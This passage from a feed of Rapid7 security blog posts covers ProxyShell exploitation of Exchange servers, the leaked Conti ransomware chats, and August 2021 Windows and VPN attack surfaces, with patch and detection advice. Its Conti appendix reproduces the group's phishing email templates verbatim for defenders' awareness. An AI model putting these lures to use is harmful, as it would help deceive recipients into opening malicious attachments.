2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>)\n\n_While CVE-2021-34473 and CVE-2021-34523 were patched in April, Microsoft\u2019s advisories note that they were inadvertently omitted from publication until July._\n\nWhen chained, these vulnerabilities allow the attacker to bypass ACL controls, send a request to a PowerShell back-end, and elevate privileges, effectively authenticating the attacker and allowing for remote code execution. Both public and private proof-of-concept exploits have been released as of August 18, 2021\u2014not surprising, since ProxyShell was first demonstrated more than four months ago at Pwn2Own. A number of [technical analyses](<https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/>) of the chain have also [been published](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>). See Rapid7's exploit chain analysis [in AttackerKB](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>).\n\nNotably, there has been confusion about which CVE is which across various advisories and research descriptions \u2014 Microsoft, for instance, describes CVE-2021-34473 as a remote code execution vulnerability, but [Orange Tsai\u2019s Black Hat slides](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) list CVE-2021-34473 as the initial ACL bypass. Community researchers have also [expressed confusion](<https://twitter.com/GossiTheDog/status/1424791670076411905>) over CVE numbering across the ProxyShell chain, but ultimately, the takeaway is the same: Organizations that have not patched these vulnerabilities should do so on an emergency basis and invoke incident response protocols to look for indicators of compromise.\n\n## Affected products\n\nThe following versions of Exchange Server are vulnerable to all three ProxyShell CVEs:\n\n * Microsoft Exchange Server 2019 Cumulative Update 9\n * Microsoft Exchange Server 2019 Cumulative Update 8\n * Microsoft Exchange Server 2016 Cumulative Update 20\n * Microsoft Exchange Server 2016 Cumulative Update 19\n * Microsoft Exchange Server 2013 Cumulative Update 23\n\nOrganizations that rely on on-premises installations of Exchange Server and are not able to move to O365 should ensure that all Exchange instances are patched on a zero-day basis. In order to do this, it is vital that defenders keep up-to-date with quarterly Cumulative Updates, since Microsoft only releases security fixes for [the most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>).\n\nWhile ProxyShell and March\u2019s ProxyLogon exploit chain are the two attacks that have already resulted in widespread exploitation, they are not the only exploit chains targeting on-premises Exchange servers. Exchange continues to be valuable and accessible attack surface area for both sophisticated and run-of-the-mill threat actors, and we will certainly see additional widespread exploitation in the future.\n\nRead more from our emergent threat response team on [high-priority attack surface area](<https://www.rapid7.com/blog/post/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/>), including Windows Print Spooler and Pulse Connect Secure VPNs.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to all three ProxyShell CVEs with authenticated vulnerability checks.\n\nThe following attacker behavior detection is available InsightIDR customers:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\nThis detection will identify processes spawned by Microsoft IIS processes that have been configured to serve as Outlook Web Access web servers for Microsoft Exchange. Rogue processes being spawned may be an indication of a successful attack against these systems and has been observed targeted by various malicious actors.\n\nIf this detection fires in your environment, you should determine whether it is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having any possibly affected users change their passwords.\n\n## Updates\n\n**August 25, 2021:** Rapid7 estimates that there are over 84,000 Exchange servers that appear vulnerable to the ProxyShell attack chain. \n![ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers](https://blog.rapid7.com/content/images/2021/08/8.25.ProxyShell.png)\n\n**August 23, 2021:** Multiple sources have now [reported](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that at least one ransomware gang (LockFile) is chaining ProxyShell with PetitPotam (CVE-2021-36942) to compromise Windows domain controllers. See [Rapid7's blog on PetitPotam](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) for patching and additional required mitigation advice.\n\n**August 21, 2021:** Rapid7's Managed Detection and Response (MDR) and Incident Response (IR) teams have noted a significant uptick in Exchange exploitation by multiple threat actors. Community researchers have also noted that attackers are exploiting the ProxyShell vulnerabilities to drop webshells and [spread ransomware](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) on vulnerable targets.\n\nWe are monitoring for additional attacker behavior and will update this blog as further information comes to light.\n\n**August 16, 2021:** We have begun to see public proof-of-concept (PoC) code implementing the ProxyShell exploit chain. Exploitation is ongoing.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T21:08:43", "type": "rapid7blog", "title": "ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-12T21:08:43", "id": "RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "href": "https://blog.rapid7.com/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T17:28:27", "description": "![Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict](https://blog.rapid7.com/content/images/2022/03/contileaks.jpg)\n\n**_UPDATE: _**_As of March 2, 2022, Conti began taking down exposed infrastructure as a result of the chat disclosure. At that time, we assessed that due to their sophisticated capability, deep funding, and quick recovery from exposed infrastructure in November 2021, they remained an active and significant threat. As of March 9, 2022, our threat intelligence team has observed a resumption of normal operations from Conti._\n\nOn February 27, Twitter user [@ContiLeaks](<https://twitter.com/contileaks>) released a trove of chat logs from the ransomware group, Conti \u2013 a sophisticated ransomware group whose manual was publicly [leaked last year](<https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html>). Ahead of the chat log disclosures, Conti pledged their support for the Russian Government following the Russian invasion of Ukraine. However, a number of members sided with Ukraine, causing strife within the organization. Two days later, Conti posted a second message revising their statement to condemn the war and to strike back only if Russian critical infrastructure is targeted.\n\n![Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict](https://blog.rapid7.com/content/images/2022/03/image3.png)_Conti announcement of support for Russian government_\n\n![Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict](https://blog.rapid7.com/content/images/2022/03/image1.jpg)_Conti walk-back of their support for Russia_\n\n![Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict](https://blog.rapid7.com/content/images/2022/03/image4.png)_@ContiLeaks announcement of the release_\n\nAt the time of the leak, a file titled `1.tgz` was released on the \u201cAnonFiles\u201d website, containing 14 megabytes of chat logs across 393 JSON files. However, some of the messages were encrypted and could not be read, so the information provided is necessarily incomplete. The remaining files contained internal Conti communications, screenshots of tools, and discussions of their exploits and design processes. \n\nOn February 28 and March 1, a bevy of additional files were posted, along with a number of pro-Ukraine tweets. Among both sets of leaked messages, there were a number of usernames and passwords for a variety of accounts. Additionally, user @ContiLeaks shared access details for a number of alleged Conti command and control servers, plus storage servers for stolen files. However, we have not accessed any of the data necessitating access to remote servers or the use of usernames and passwords, and we strongly recommend against doing so. \n\n@ContiLeaks also shared a file that they purport to be the source code for the Conti ransomware but declined to share the password except with \u201ctrusted parties.\u201d @ContiLeaks did, however, name one alleged Conti developer, providing their email address and Github. The scale of the leaked information suggests that the leaker is likely either a very senior member of the group or a coalition of disgruntled Conti affiliates.\n\n## Conti is a business \u2013 and a well-funded one\n\nMuch of the discussion within the chat logs concerns fairly mundane things \u2013 interviewing potential operators of the group, payment for services, out-of-office messages, gossip, and discussions of products. Based on the leaked chats, the Conti interview process actually looks a lot like a standard technical interview, with coding exercises to be performed hosted on public code repositories, salary negotiations, and the status of ongoing products. \n\nIn addition to other financial information related to specific actors, the leaked chats have revealed Conti\u2019s primary Bitcoin address, which contains over **two billion USD** as of February 28, 2022. Moreover, a conversation on April 9, 2021 between \u201cmango\u201d and \u201cjohnyboy77\u201d indicates Russian FSB involvement in some portion of their funding and that the FSB were interested in files from the media outlet Bellingcat on \u201cNavalny\u201d \u2013 an apparent reference to Alexei Navalny, the currently imprisoned opposition leader in Russia.\n\n## Conti development\n\nConti seems to operate much like a software company \u2013 the chat logs disclose concerns with the development of specific features for targets and a particular difficulty in encrypting very large files. The Conti team also attempted to get demos of popular endpoint detection software with the intent to develop their malware to avoid detection.\n\nTwo of the actors, \u201clemur\u201d and \u201cterry\u201d shared phishing templates (included verbatim in Appendix B at the end of this post) to be used against potential targets. Conti gains initial access in many ways, with phishing a popular line of attack due in part to its relatively high efficacy and low cost. Conti often uses phishing emails to establish a presence on targeted networks.\n\nA screenshot of the Conti control panel was also leaked, showing a number of compromised hosts and a breakdown of the operating systems, antiviruses, user rights, and detailed information about the infected assets.\n\n![Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict](https://blog.rapid7.com/content/images/2022/03/image2.png)_Conti control panel_\n\nFurther discussions detailed the use of infrastructure against targets, disclosing a number of both known and unknown Conti command and control domains. At the time of this post, only a small number of the previously unknown command and control domains appear to be active. Conversations between two operators, \u201cStern\u201d and \u201cBentley\u201d discuss the use of third parties for malicious documents, favoring certain providers over others. They also discuss logistics for how to deliver ransomware without being detected by dynamic analysis. In a conversation between the two back in June of 2021, Stern discloses that Conti wants to start their own cryptocurrency but does not know who to work with. There is no evidence that anything came of this desire, and Conti continues to use Bitcoin for their ransoms. \n\n## Other groups assert they are strictly business\n\nIn stark contrast to Conti, other groups have made it clear to the public that despite their \u201cbusiness model,\u201d they take no public stance on this crisis. LockBit is remaining aloof from the conflict and made it clear that they intend to operate as usual. Although it is believed that LockBit is a Russian organization, they assert that \u201cwe are all simple and peaceful people, we are all Earthlings,\u201d and \u201cfor us it is just business and we are all apolitical.\u201d Another ransomware group, ALPHV, claims to be \u201cextremely saddened\u201d by Conti\u2019s pledge of support and condemns Conti. Their message concludes, \u201cThe Internet, and even more so its dark side, is not the place for politics.\u201d\n\n## Rumors of Conti\u2019s demise have been greatly exaggerated\n\nConti\u2019s payment and \u201csupport\u201d portal is still live, even following the infighting and leaks. Conti has repeatedly proven to be one of the most capable ransomware actors and these chats indicate that the group is well-organized and still very well-funded despite the schism. Any suggestion that these leaks spell the end for Conti is overstated, and we expect that Conti will continue to be a powerful player in the ransomware space.\n\n## What you can do\n\nWe are keeping an eye on dark web activity related to Conti and other ransomware groups and want to reiterate the following steps for protecting yourself from ransomware: \n\n\n * User education, especially related to well-crafted phishing campaigns\n * Asset and vulnerability management, including reducing your external attack surface\n * Multi-factor authentication \n\n\nAdditionally, it is worth ensuring that you are well-guarded against the exploits and malware commonly used by Conti (vulnerabilities provided in Appendix A at the end of this post). Furthermore, security teams should also take some time to review [CISA\u2019s recent report on the group](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>). For further discussion on how to protect yourself from ransomware, see our [ransomware playbook](<https://www.rapid7.com/solutions/ransomware/>). \n\n\n## Appendix A \u2013 Conti known exploited vulnerabilities\n\nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146 (MS17-010; EternalBlue/EternalSynergy/EternalChampion)\n\nCVE-2020-1472 (ZeroLogon)\n\nCVE-2021-34527 (PrintNightmare)\n\nCVE-2021-44228 (Log4Shell)\n\nCVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (ProxyShell/ProxyLogon)\n\n## Appendix B \u2013 Phishing templates\n\n{Greetings|Hello|Good afternoon|Hi|Good day|Greeting|Good morning|Good evening}! \n{Here|Right here|In this letter|With this letter} we {send|direct} you {all the|all the necessary|the most important} {documentation|papers|documents|records} {regarding|concerning|relating to} your {payment|deposit payment|last payment} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u041f\u041b\u0410\u0422\u0415\u0416\u0410, right {as we|as we have} {discussed|revealed} {not so long ago|not too long ago|recently|just recently|not long ago}. Please {review the|check the|take a look at} \u0430ll {necessary|required|important} {information|data} in the {file attached|attached file}. \n\u0422: {Payment|Deposit payment} {invoice|receipt} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u0418\u041d\u0412\u041e\u0419\u0421\u0410 {prepared|formed} \nD: {payment|deposit|dep|paym}_{info|information|data}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \nYour {order|purchase order|online order} was {successfully|correctly|timely} {paid|compensated|covered} by you {yesterday|today|recently}. Your {documentation|docs|papers} and {bank check|receipt|paycheck} {can be found|are listed} in the {attached file|file attached}. \nT: {Invoice|Given invoice|Bill} {we|we have|we\u2019ve} {sent|mailed|delivered} to you {is paid|is covered|is processed}. \nD: {Purchase order|Order} {verification|approval}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{We are contacting you to|This is to|This mail is to} {notify|remind} you {about|regarding} your {debt|unprocessed payment} for {our last|the recent|our recent} {contract|agreement}. All {compensation|payment} {data|information}, {agreement|contract} and prepared legal {documents|documentation} {can be found|are located} in the {file attached|attached file}. \nT: {Missing|Additional} payment {information|details|info} reminder \nD: {Contract|Agreement} 2815/2 {case|claim}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{Your payment|Your advance payment|Your obligatory payment|Payment you sent|Payment you made} was {successfully|correctly|timely|properly} {achieved|accomplished|approved|affirmed|received|obtained|collected|processed}. All {required documentation|necessary documents|important documentation|documents you need|details that can be important|essential documents} {can be found|you can find} in the {attached file|file attached}. \nT: {Invoicing|Invoice|Agreement|Contract|Payment} {info|data|information|details} \nD: {Receipt|Bill} {id|ID|Number|number|No.|No.|No|#|##} 3212-inv8\n\n{Greetings|Hello|Good day|Good afternoon}{!|,|} \n{Thank you for|We are thankful for|We are grateful for|Many thanks for} {your|your recent} {on-line order|purchase order|order}. {We|Our financiers have|Our team has|We have|Our shop has} {received|collected|processed|checked} your {payment|advance payment|money transfer|funds transfer} \u041d\u041e\u041c\u0415\u0420 \u041f\u0415\u0420\u0415\u0412\u041e\u0414\u0410. Now we {are and ready to|begin to} {pack|prepare|compose} your {shipment|order|box}. Your {parcel|packet|shipment|box} {will|is going to|would} {arrive|be delivered} to {you|your residence} within {4|5|6|four|five|six} {days|business days}. \n{Total|Full|Whole} {order|purchase|payment} sum: \u0421\u0423\u041c\u041c\u0410 \nYou {can find|will find} {all|full} {relative information|order info|order and payment details} and your {receipt|check} \u041d\u041e\u041c\u0415\u0420 \u0427\u0415\u041a\u0410 {in|in the} {attached file|file attached}. \n{Thank you!|Have a nice day!} \n\u0422\u0415\u041c\u042b: Your {order|purchase|on-line order|last order} \u041d\u041e\u041c\u0415\u0420 \u0417\u0410\u041a\u0410\u0417\u0410 payment {processed|obtained|received} \n\u0410\u0422\u0422\u0410\u0427\u0418: \nord_conf \nfull.details \ncompl_ord_7847 \nbuyer_auth_doc \ninfo_summr \ncustomer_docs \nspec-ed_info\n\n \n_**Additional reading**_\n\n * _[Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)_\n * _[Staying Secure in a Global Cyber Conflict](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)_\n * _[Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-03-01T19:15:58", "type": "rapid7blog", "title": "Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2020-1472", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-44228"], "modified": "2022-03-01T19:15:58", "id": "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "href": "https://blog.rapid7.com/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T01:34:04", "description": "![Popular Attack Surfaces, August 2021: What You Need to Know](https://blog.rapid7.com/content/images/2021/08/August-vulns.jpg)\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n![Popular Attack Surfaces, August 2021: What You Need to Know](https://blog.rapid7.com/content/images/2021/08/image.png)\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a workaround for [CVE-2020-8260](<https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/%E2%80%8B%E2%80%8Bhttps://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: "This attack is too easy." You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and 